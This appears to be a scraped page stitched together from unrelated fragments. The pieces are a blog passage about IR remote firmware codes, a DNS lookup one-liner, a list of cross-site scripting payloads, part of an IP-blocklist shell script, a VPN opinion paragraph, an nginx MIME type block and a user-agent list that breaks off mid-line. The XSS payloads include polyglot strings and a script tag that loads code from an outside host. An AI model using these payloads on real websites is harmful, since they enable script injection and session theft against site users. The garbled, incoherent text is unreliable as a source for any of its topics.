Carrying on from part 1 we move on from codes converted from the old Pronto HEX format to learned codes
Initally these seem to have only a passing resemblence to the ECF codes converted from Pronto HEX. There are some bytes at the beginning that are the same but then after that not so much, and they are much, much longer
Here's a learned code for a Sony TV mute command, which is the same command that we had the Pronto HEX for
| dig @8.8.8.8 +short txt _netblocks.google.com | awk '{gsub("ip4:","");for (col=2; col<NF;++col) print $col}' |
Note that some of the conclusions here are incorrect and have been updated in part 2
The firmware can be downloaded from Remote Central
Unzipping the download gives a single file, extfw-1.4.7-philips.bin
Despite the name, this is just another zip.
| ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
| '';!--"<XSS>=&{()} | |
| 0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
| <script/src=data:,alert()> | |
| <marquee/onstart=alert()> | |
| <video/poster/onerror=alert()> | |
| <isindex/autofocus/onfocus=alert()> | |
| <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
| <IMG SRC="javascript:alert('XSS');"> | |
| <IMG SRC=javascript:alert('XSS')> |
| #!/bin/bash | |
| # Adapted from http://www.linuxjournal.com/content/server-hardening?page=0,2 | |
| PATH=$PATH:/sbin | |
| WD=`pwd` | |
| TMP_DIR=$WD/tmp | |
| IP_TMP=$TMP_DIR/ip.temp | |
| IP_BLOCKLIST=$WD/ip-blocklist.conf | |
| IP_BLOCKLIST_TMP=$TMP_DIR/ip-blocklist.temp | |
| list="nigerian russian lacnic exploited-servers" |
No, seriously, don't. You're probably reading this because you've asked what VPN service to use, and this is the answer.
Note: The content in this post does not apply to using VPN for their intended purpose; that is, as a virtual private (internal) network. It only applies to using it as a glorified proxy, which is what every third-party "VPN provider" does.
| types { | |
| # Data interchange | |
| application/atom+xml atom; | |
| application/json json map topojson; | |
| application/ld+json jsonld; | |
| application/rss+xml rss; | |
| application/vnd.geo+json geojson; | |
| application/xml rdf xml; |
| # http://techblog.willshouse.com/2012/01/03/most-common-user-agents/ | |
| Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36 | |
| Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36 | |
| Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36 | |
| Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36 | |
| Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36 | |
| Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36 | |
| Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36 | |
| Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36 | |
| Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKi |
